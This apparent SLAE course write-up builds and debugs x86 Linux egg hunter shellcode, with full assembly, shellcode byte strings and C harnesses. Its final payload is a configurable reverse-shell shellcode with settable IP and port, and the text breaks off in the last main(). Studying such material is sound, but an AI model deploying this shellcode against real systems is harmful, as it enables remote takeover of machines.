SLAE: Assignment 3 of 7

Assignment #3 objectives:
- Study Egg Hunter shellcode
- Create a working demo of an egghunter
- The egg hunter should be configurable for different payloads
=============================================

Looking on exploit-db.com, there are various egghunter shellcodes available. Most come with detailed explanations of how they work. The goal of this assignment is to study the shellcode to figure out how egghunters work. Upon reading generic egghunter shellcodes, the goal of egghunters is simple: Tag large shellcode with an "egg", and use a very small piece of code - the egg hunter - to find the egg and jump to the egg to execute the shellcode. The reason for egg hunting code is that sometimes, there isn't enough space in memory to store a large piece of exploit code: With an egg hunter, you can store shellcode in any part of memory using other techniques than the actual vulnerability in a program - for instance via program parameters - , search for it, then execute it.

I found the following PDF which details how egg hunters work:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

We use the following code as a base:

/*
Source: https://www.exploit-db.com/exploits/37749/
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
    Website: http://networkfilter.blogspot.com
    Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
 
This code was created as an exercise for the 
SecurityTube Linux Assembly Expert (SLAE).
 
Egg signature = 0x50905090 (push eax, nop, push eax, nop)
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because
the first address check could match the hardcoded egg signature in
the egg hunter itself. As we do not store hardcoded egg signature 
below, it allows us to check only 4 bytes once.
 
egg-hunter.asm:
----------------
 
global _start
 
section .text
 
_start:
        mov eax, addr             ; retrieve a valid address (shorter than using JMP CALL POP)
        mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1
        inc ebx                   ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
 
next_addr:
        inc eax                   ; increasing memory address to look at next address
        cmp dword [eax], ebx      ; check if our egg is at that memory address, if yes set ZF = 1
        jne next_addr             ; if ZF = 0 (check failed), then jump to next_addr to check next address
        jmp eax                   ; we found our egg (ZF = 1), jump at this address
 
        addr: db 0x1
*/
 
/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/
 
#include<stdio.h>
#include<string.h>
 
// Egg hunter 19 bytes (\x00 \x0a \x0d free)
unsigned char egghunter[] = \
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
"\xfb\xff\xe0\x01";
 
// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
 
main()
{
        printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
        int (*ret)() = (int(*)())egghunter;
        ret();
}

Note: We compile the program and execute it:

gcc -fno-stack-protector -z execstack myegg.c -o myegg
./myegg

Egg hunter shellcode Length:  19
Egg Found!!

echo -n $'\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75\xfb\xff\xe0\x01' | ndisasm -u -

00000000  B872800408        mov eax,0x08048072
00000005  BB8F509050        mov ebx,0x5090508f
0000000A  43                inc ebx
0000000B  40                inc eax
0000000C  3918              cmp [eax],ebx
0000000E  75FB              jnz 0xb
00000010  FFE0              jmp eax
00000012  01                db 0x01

Note: I analyze each line in the code:

00000000  B872800408        mov eax,0x08048072
Sets EAX to the base address of Linux programs

00000005  BB8F509050        mov ebx,0x5090508f
Sets EBX to a value that will become the egg in the next instruction

0000000A  43                inc ebx
Sets EBX to 0x50905090 which is the real egg

Note: The egg code, when executed, does nothing damaging to the execution of the program except for stack corruption:

echo -n $'\x90\x50\x90\x50' | ndisasm -u -

00000000  90                nop
00000001  50                push eax
00000002  90                nop
00000003  50                push eax
Note: If we executed the egg itself, nothing bad would happen except for some stack corruption. If we want a stack-neutral egg, a better option might be to first push eax, then pop it in the next instruction.

0000000B  40                inc eax
Increase EAX by one - this will be jumped to later when searching for the egg

0000000C  3918              cmp [eax],ebx
Compare the egg in EBX, with the code pointed to by EAX

0000000E  75FB              jnz 0xb
If the egg isn't found at EAX, jump to 0000000B to search the next address

00000010  FFE0              jmp eax
If the egg is found, then jump to EAX - which is the egg

00000012  01                db 0x01
This byte is used by the very first instruction to dynamically determine the base memory address at compilation time.

So now that we know how egghunters work we can create our own; let the fun begin!
Now, we need to find a good way to encode our egg value. We can't store the egg directly in our code, because if we do then our egghunter is going to find the egg in the egghunting code instead of the actual shellcode.

There is a nice function SHL and SHR which bit-shifts a value. Effectively a SHL by 1 multiplies the register value by 2, a SHR by 1 divides by 2.

; Filename: egghunter1.nasm
; Author:  JollyFrogs (frog@jollyfrogs.com)
; Purpose: This assembly code is an egg hunter which looks for egg '\x02\x04\x08\x10'

global _start

section .text

_start:
mov edi, 0x08048072      ; Linux base address

restart_search:
mov al, byte 0x02
egg_not_found:
scasb                ; compare byte at EDI with al, increase EDI if not
jne egg_not_found
egg_possibly_found:
shl al, 0x1           ; eax = 02 -> 04 -> 08 -> 10
cmp al, 0x20          ; eax will only ever be 20 if \x02\x04\x08\x10 is found
je egg_found
scasb                ; compare byte at EDI with al, increase EDI if not
jne restart_search   ; if this isn't the egg, then restart search
egg_found:
jmp edi              ; jump to shellcode

Note: We compile our assembly and grab the shellcode:

./compile.sh egghunter1
objdump -d ./egghunter1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

\xbf\x72\x80\x04\x08\xb0\x02\xae\x75\xfd\xd0\xe0\x3c\x20\x74\x03\xae\x75\xf2\xff\xe7

Let's try our new egghunter!

/*
Filename: myegg2.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg2.c -o myegg2
*/
#include<stdio.h>
#include<string.h>

unsigned char egghunter[] = \
"\xbf\x72\x80\x04\x08\xb0\x02\xae\x75\xfd\xd0\xe0\x3c\x20\x74\x03\xae\x75\xf2\xff\xe7";

// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x02\x04\x08\x10" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

main()
{
printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}

Note: We compile our program and test it:

gcc -m32 -fno-stack-protector -z execstack myegg2.c -o myegg2
./myegg2

Egg hunter shellcode Length:  21
Egg Found!!

Note: Wow that was easy: Didn't even need GDB and the cat's already in the bag!

We can now use the shellcode from assignment 2 and add our egg hunter:

/*
Filename: myegg3.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg3.c -o myegg3
Shellcode size: 79 Bytes
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>

unsigned char egghunter[] = \
"\xbf\x72\x80\x04\x08\xb0\x02\xae\x75\xfd\xd0\xe0\x3c\x20\x74\x03"
"\xae\x75\xf2\xff\xe7";

unsigned char shellcode[] = \
"\x02\x04\x08\x10" // Egg signature
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43"
"\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87"
"\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80";

static bool shellcode_zerocheck() {
// initialize counter
int i = 0;
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(shellcode)-1; i++) {
if (shellcode[i] == '\x00') {
printf("Zero found in shellcode at position %i\n",i);
return false;
}
}
// Return true if no zeroes found
return true;
}

static bool egghunter_zerocheck() {
// initialize counter
int i = 0;
// check each byte in egghunter array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(egghunter)-1; i++) {
if (egghunter[i] == '\x00') {
printf("Zero found in egghunter at position %i\n",i);
return false;
}
}
// Return true if no zeroes found
return true;
}

static bool shellcode_settargetport(char *buf, int port) {
// Check if decimal port is valid
if (port<1024 || port>65535) return false;
// The offset of the port is 21, but reduce by 1 since the array counts from 0
int port_offset = 24; // (\x15\xb3)
// convert decimal port to hexidecimal
*(short *)(buf+port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap port bytes to accommodate for Little Endian memory structure
char tmp = buf[port_offset];
buf[port_offset] = buf[port_offset+1];
buf[port_offset+1] = tmp;
// Check if the hexidecimal port contains zeroes, if it does then show an error
if (shellcode[port_offset] == '\x00' || shellcode[port_offset+1] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}

static bool shellcode_settargetip(char *buf, char *ip) {
int ip_offset = 17; // (\x7f\x01\x01\x01\)
unsigned char value[4] = {0};
size_t index = 0;
while (*ip) {
if (isdigit((unsigned char)*ip)) {
value[index] *= 10;
value[index] += *ip - '0';
} else {
index++;
}
ip++;
}
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
int i = 0; for(i = 0; i < 4; i++) {
*(char *)(buf+ip_offset+i) = value[i];
if (shellcode[ip_offset+i] == '\x00'){printf("port HEX contains zeroes\n"); return false;}
}
// Return true if all checks passed
return true;
}

main () {
// Port in decimal - should be higher than 1024 and lower than 65536
int targetport = 1234;
char *targetip = "127.1.1.1";
// Basic error checking
if (!shellcode_settargetport(shellcode, targetport)) {printf("ERROR: Invalid targetport\n");return 0;}
if (!shellcode_settargetip(shellcode, targetip)) {printf("ERROR: Invalid targetip\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
if (!egghunter_zerocheck()) {printf("ERROR: Egghunter contains zeroes\n");return 0;}
// Print shellcode length.
printf("Shellcode Length:  %d\n", strlen(shellcode));
// Run assembly commands
__asm__ (
// Initialize registers
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// execute egghunter
"jmp egghunter");
}

Note: We compile our program and run it in gdb:

gcc -m32 -fno-stack-protector -z execstack myegg3.c -o myegg3
./myegg3

Shellcode Length:  83
Segmentation fault (core dumped)

Note: Upon running the code, we receive a segmentation fault. It seems this cat managed to slip out of the bag somehow. Using gdb, I found that the cause of the segfault is due to the egghunter searching in areas of memory that it had no access to. I thus had to come up with a new egghunter that checks the memory space for read access before trying to read it. I did some research and found the following document: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf I will use Skape's egg hunter as a basis for my egghunter:

;skape.nasm
;Skape's original egghunter
xor edx,edx
or dx,0xfff
inc edx
lea ebx,[edx+0x4]
push byte +0x21
pop eax
int 0x80
cmp al,0xf2
jz 0x2
mov eax,0x50905090
mov edi,edx
scasd
jnz 0x7
scasd
jnz 0x7
jmp edi

This is what I came up with:

; Filename: egghunter2.nasm
; Author:  JollyFrogs (frog@jollyfrogs.com)
; egg: \x02\x04\x08\x10

global _start

section .text
_start:
mov cl, byte 0x02     ; set CL to 02
xor edx,edx           ; EDI = 00000000
next_page:
or dx,0xfff           ; change EDI last 3 bytes to FFF
next_byte_in_page:
inc edx               ; add EDI by 1 (together = 1000)
lea ebx,[edx+0x4]     ; validate 8 bytes of contiguous memory
push byte +0x21       ; PUSH 21
pop eax               ; EAX = 00000021 = SYSCALL.ACCESS(2)
int 0x80              ; SYSCALL.ACCESS(2)
cmp al,0xf2
jz next_page          ; if no access to memory then increase page
mov edi,edx           ; set EDI to the accessible memory location
mov al, cl            ; AL = 02
scasb                 ; compare byte at EDI with AL and increase EDI
jne next_byte_in_page
egg_possibly_found:
shl al, 0x1           ; eax = 02 -> 04 -> 08 -> 10
cmp al, 0x20          ; eax will only ever be 20 if \x02\x04\x08\x10 is found
je egg_found
scasb                 ; compare byte at EDI with AL and increase EDI
je egg_possibly_found ; if this isn't the egg, then restart search
jmp next_byte_in_page ; egg not found, start new search
egg_found:
jmp edi               ; jump to shellcode

Note: We compile our egghunter assembly code and grab the shellcode bytes:

nasm -f elf32 -o egghunter2.o egghunter2.nasm | ld -o egghunter2 egghunter2.o
objdump -d ./egghunter2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\xb1\x02\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\x89\xd7\x88\xc8\xae\x75\xec\xd0\xe0\x3c"
"\x20\x74\x05\xae\x74\xf7\xeb\xe1\xff\xe7"

/*
Filename: myegg4.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg4.c -o myegg4
*/
#include<stdio.h>
#include<string.h>

unsigned char egghunter[] = \
"\xb1\x02\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\x89\xd7\x88\xc8\xae\x75\xec\xd0\xe0\x3c"
"\x20\x74\x05\xae\x74\xf7\xeb\xe1\xff\xe7";

// Print "Egg Found!!" on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x02\x04\x08\x10" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

main()
{
printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}

Note: We compile our new program and test it again:

gcc -m32 -fno-stack-protector -z execstack myegg4.c -o myegg4
./myegg4

Egg hunter shellcode Length:  42
Egg Found!!

Note: Oh, yes... Cat back in that bag! Our egghunter shellcode doubled in size, but it is more reliable. If it works, we can look at optimizing this code later. Let's give it a try.

/*
Filename: myegg5.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg5.c -o myegg5
Shellcode size: 79 Bytes
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>

unsigned char egghunter[] = \
"\xb1\x02\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\x89\xd7\x88\xc8\xae\x75\xec\xd0\xe0\x3c"
"\x20\x74\x05\xae\x74\xf7\xeb\xe1\xff\xe7";

unsigned char shellcode[] = \
"\x02\x04\x08\x10" // Egg signature
"\x90\x90\x90\x90" // nop chain
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43"
"\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87"
"\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80";

static bool shellcode_zerocheck() {
// initialize counter
int i = 0;
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(shellcode)-1; i++) {
if (shellcode[i] == '\x00') {
printf("Zero found in shellcode at position %i\n",i);
return false;
}
}
// Return true if no zeroes found
return true;
}

static bool egghunter_zerocheck() {
// initialize counter
int i = 0;
// check each byte in egghunter array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(egghunter)-1; i++) {
if (egghunter[i] == '\x00') {
printf("Zero found in egghunter at position %i\n",i);
return false;
}
}
// Return true if no zeroes found
return true;
}

static bool shellcode_settargetport(char *buf, int port) {
// Check if decimal port is valid
if (port<1024 || port>65535) return false;
// The offset of the port is 21, but reduce by 1 since the array counts from 0
int port_offset = 24; // (\x15\xb3)
// convert decimal port to hexidecimal
*(short *)(buf+port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap port bytes to accomodate for Little Endian memory structure
char tmp = buf[port_offset];
buf[port_offset] = buf[port_offset+1];
buf[port_offset+1] = tmp;
// Check if the hexidecimal port contains zeroes, if it does then show an error
if (shellcode[port_offset] == '\x00' || shellcode[port_offset+1] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}

static bool shellcode_settargetip(char *buf, char *ip) {
int ip_offset = 17; // (\x7f\x01\x01\x01\)
unsigned char value[4] = {0};
size_t index = 0;
while (*ip) {
if (isdigit((unsigned char)*ip)) {
value[index] *= 10;
value[index] += *ip - '0';
} else {
index++;
}
ip++;
}
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
int i = 0; for(i = 0; i < 4; i++) {
*(char *)(buf+ip_offset+i) = value[i];
if (shellcode[ip_offset+i] == '\x00'){printf("port HEX contains zeroes\n"); return false;}
}
// Return true if all checks passed
return true;
}

main () {
// Port in decimal - should be higher than 1024 and lower than 65536
int targetport = 1234;
char *targetip = "127.1.1.1";
// Basic error checking
if (!shellcode_settargetport(shellcode, targetport)) {printf("ERROR: Invalid targetport\n");return 0;}
if (!shellcode_settargetip(shellcode, targetip)) {printf("ERROR: Invalid targetip\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
if (!egghunter_zerocheck()) {printf("ERROR: Egghunter contains zeroes\n");return 0;}
// Print shellcode length.
printf("Shellcode Length:  %d\n", strlen(shellcode));
printf("Egghunter Length:  %d\n", strlen(egghunter));
// Run assembly commands
__asm__ (
// Initialize registers
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// execute egghunter
"jmp egghunter");
}

Note: We compile the latest revision of our program:

./myegg5

Shellcode Length:  87
Egghunter Length:  42
Segmentation fault (core dumped)

Note: Hm.. another segfault... not looking good - let's see what's going on

gdb myegg5 -ex 'break *&egghunter+5' -ex 'run'

--------------------------------------------------------------------------[regs] EAX: 0xFFFFFFEA  EBX: 0x00001004  ECX: 0x12345602  EDX: 0x00001000  o d I t S z a p C
ESI: 0x12345678  EDI: 0x12345678  EBP: 0x12345678  ESP: 0xBFFFF340  EIP: 0x0804A054
CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B  Jump is NOT taken (z!=1)
--------------------------------------------------------------------------[code] => 0x804a054 <egghunter+20>:    je     0x804a044 <egghunter+4>
Note: We can see that EAX is 0xFFFFFFEA
Note: The error code is in two's complement value. It can be decoded as follows into the decimal equivalent error code:
0xFFFFFFFF - 0xFFFFFFEA + 1 = 22

cat /usr/include/asm-generic/errno-base.h

Code 22 means EINVAL. We can look up what that means as follows:

man 2 access

ERRORS
access() shall fail if:
EACCES        The requested access would be denied to the file, or search permission is denied for one
of the directories in the path prefix of pathname.  (See also path_resolution(7).)
ELOOP         Too many symbolic links were encountered in resolving pathname.
ENAMETOOLONG  pathname is too long.
ENOENT        A component of pathname does not exist or is a dangling symbolic link.
ENOTDIR       A component used as a directory in pathname is not, in fact, a directory.
EROFS         Write permission was requested for a file on a read-only file system.

access() may fail if:
EFAULT        pathname points outside your accessible address space.
 EINVAL        mode was incorrectly specified.
EIO           An I/O error occurred.
ENOMEM        Insufficient kernel memory was available.
ETXTBSY       Write access was requested to an executable which is being executed.

Note: We see the following: EINVAL - mode was incorrectly specified.
Upon running the file in gdb and check the arguments to ACCESS, we find ECX, the register that holds the "mode" argument, isn't set properly (ECX is 0x12345602 just before the INT 0x80 instruction). The "man 2 access" command further reveals valid values for "mode" parameter: R_OK, W_OK, and X_OK.  F_OK. Since we're checking for read access to the memory, we need to set R_OK. So how can we find what R_OK maps to?

cat /usr/include/unistd.h | grep R_OK

#define   R_OK  4  /* Test for read permission. */
Note: So ECX should be set to 4 if we want to check R_OK, or 0 if we want to check F_OK. We modify the assembly language and recompile.

; Filename: egghunter3.nasm
; Author:  JollyFrogs (frog@jollyfrogs.com)
; egg: \x01\x02\x04\x08\x10\x20

global _start

section .text
_start:
xor ecx,ecx           ; ECX = 00000000 (F_OK)
mul ecx               ; EAX = 00000000, EDX = 00000000
next_page:
or dx,0xfff           ; change EDI last 3 bytes to FFF
next_byte_in_page:
inc edx               ; add EDI by 1 (together = 1000)
lea ebx,[edx]         ; validate memory
push byte +0x21       ; PUSH 21
pop eax               ; EAX = 00000021 = SYSCALL.ACCESS(2)
int 0x80              ; SYSCALL.ACCESS(2)
cmp al,0xf2           ; F2 = EFAULT = No access to memory
je next_page          ; if no access to memory then increase page
mov edi,edx           ; set EDI to the accessible memory location
salc                  ; Shortcut to set AL = 00
inc eax               ; AL = 01
scasb                 ; compare byte at EDI with AL and increase EDI
jne next_byte_in_page
egg_possibly_found:
shl al,0x1           ; eax = 02 -> 04 -> 08 -> 10 -> 20 -> 40
cmp al,0x40          ; eax will only ever be 40 if \x01\x02\x04\x08\x10\x20 is found
je egg_found
scasb                 ; compare byte at EDI with AL and increase EDI
je egg_possibly_found ; check next byte in egg
jmp next_byte_in_page ; egg not found, start new search
egg_found:
jmp edi               ; jump to shellcode

Note: We compile our new assembly code:

nasm -f elf32 -o egghunter3.o egghunter3.nasm | ld -o egghunter3 egghunter3.o
objdump -d ./egghunter3|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x1a\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xef\x89\xd7\xd6\x40\xae\x75\xed\xd0\xe0\x3c\x40\x74\x05\xae\x74\xf7\xeb\xe2\xff\xe7"
We replace our shellcode in myegg5 with the fixed shellcode above and recompile myegg5.c

Upon running myegg5.c, we still get a segfault - more gdb is required!

gdb myegg5 -ex 'break *0x0804a067' -ex 'run'

=> 0x804a067 <egghunter+39>:    jmp    edi
gdb$ disassemble 0x0804a084
Dump of assembler code for function shellcode:
0x0804a080 <+0>:    add    DWORD PTR [edx],eax
0x0804a082 <+2>:    add    al,0x8
0x0804a084 <+4>:    xor    eax,eax
0x0804a086 <+6>:    push   eax
0x0804a087 <+7>:    inc    eax
0x0804a088 <+8>:    push   eax
0x0804a089 <+9>:    pop    ebx
0x0804a08a <+10>:    push   eax
0x0804a08b <+11>:    inc    eax
0x0804a08c <+12>:    push   eax
0x0804a08d <+13>:    mov    al,0x66
0x0804a08f <+15>:    mov    ecx,esp
0x0804a091 <+17>:    jg     0x804a094 <shellcode+20>
0x0804a093 <+19>:    add    DWORD PTR [ecx],eax
0x0804a095 <+21>:    jg     0x804a098 <shellcode+24>
0x0804a097 <+23>:    add    DWORD PTR [edx+edx*8],eax
0x0804a09a <+26>:    mov    ax,0xb315

What happened to our shellcode? Did the egg signature change the shellcode?

first we check the actual shellcode is still valid:

echo -n $'\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80′ | ndisasm -u -

The shellcode seems fine. So I check the shell with the egg prepended (the anticipation!..)

echo -n $'\x01\x02\x04\x08\x10\x20\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80′ | ndisasm -u -

The egg does not seem to affect our shellcode. Something else must be changing the shellcode during run-time.
In a light-bulb moment, I realize that we're dynamically changing the IP and port in the code, but we haven't changed our shellcode offsets: What happened was that the egg grew our shellcode by 6 bytes and we need to correct our offsets to match. So if we add 6 to the offsets of the port and IP, all should be good!
And finally, after making the changes, we have a working egg hunter shellcode. GDB once again came to the rescue and gave me the answers I needed.

The final code:

/*
Filename: myegg6.c
Author: JollyFrogs (LookoutFrog@gmail.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg6.c -o myegg6
Shellcode size: 85 Bytes
Egghunter size: 41 Bytes
*/

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>

unsigned char egghunter[] = \
"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x1a\x6a\x21\x58\xcd"
"\x80\x3c\xf2\x74\xef\x89\xd7\xd6\x40\xae\x75\xed\xd0\xe0\x3c\x40"
"\x74\x05\xae\x74\xf7\xeb\xe2\xff\xe7";

unsigned char shellcode[] = \
"\x01\x02\x04\x08\x10\x20" // Egg signature
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43"
"\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87"
"\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80";

static bool shellcode_zerocheck() {
// initialize counter
int i = 0;
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(shellcode)-1; i++) {
if (shellcode[i] == '\x00') {
printf("Zero found in shellcode at position %i\n",i);
return false;
}
}
// Return true if no zeroes found
return true;
}

static bool egghunter_zerocheck() {
// initialize counter
int i = 0;
// check each byte in egghunter array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(egghunter)-1; i++) {
if (egghunter[i] == '\x00') {
printf("Zero found in egghunter at position %i\n",i);
return false;
}
}
// Return true if no zeroes found
return true;
}

static bool shellcode_settargetport(char *buf, int port) {
// Check if decimal port is valid
if (port<1024 || port>65535) return false;
// The offset of the port is 21, but reduce by 1 since the array counts from 0
int port_offset = 30; // (\x15\xb3) (24+6 to compensate for egg)
// convert decimal port to hexidecimal
*(short *)(buf+port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap port bytes to accomodate for Little Endian memory structure
char tmp = buf[port_offset];
buf[port_offset] = buf[port_offset+1];
buf[port_offset+1] = tmp;
// Check if the hexidecimal port contains zeroes, if it does then show an error
if (shellcode[port_offset] == '\x00' || shellcode[port_offset+1] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}

static bool shellcode_settargetip(char *buf, char *ip) {
int ip_offset = 23; // (\x7f\x01\x01\x01\) (17+6 to compensate for egg)
unsigned char value[4] = {0};
size_t index = 0;
while (*ip) {
if (isdigit((unsigned char)*ip)) {
value[index] *= 10;
value[index] += *ip - '0';
} else {
index++;
}
ip++;
}
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
int i = 0; for(i = 0; i < 4; i++) {
*(char *)(buf+ip_offset+i) = value[i];
if (shellcode[ip_offset+i] == '\x00'){printf("port HEX contains zeroes\n"); return false;}
}
// Return true if all checks passed
return true;
}

main () {
// Port in decimal - should be higher than 1024 and lower than 65536
int targetport = 1234;
char *targetip = "127.1.1.1";
// Basic error checking
if (!shellcode_settargetport(shellcode, targetport)) {printf("ERROR: Invalid targetport\n");return 0;}
if (!shellcode_settargetip(shellcode, targetip)) {printf("ERROR: Invalid targetip\n");return 0;}
